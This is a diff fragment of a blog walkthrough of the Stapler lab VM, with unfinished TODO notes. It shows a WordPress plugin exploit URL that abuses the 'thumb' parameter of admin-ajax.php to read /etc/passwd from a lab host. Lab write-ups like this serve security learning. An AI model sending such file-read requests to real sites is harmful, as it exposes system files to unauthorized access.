bovinehero/bovinehero.github.io/_posts/2019-06-18-Stapler-Walkthrough.md

 the PoC code in the exploit suggests that we can test the functionality with this url: http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

+the exploit produces a success of sort

 if we go to ```https://192.168.56.104:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd``` we should create a file upload with the contents of /etc/passwd.

 the exploit produces a success of sorts and a url.

-> TODO get outputs

-Following the url we get a 404. hmmmm so what happened?
+Following the url above we get a 404. hmmmm so what happened?

 lets take a closer look at the url parameters of the php page:
 /wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]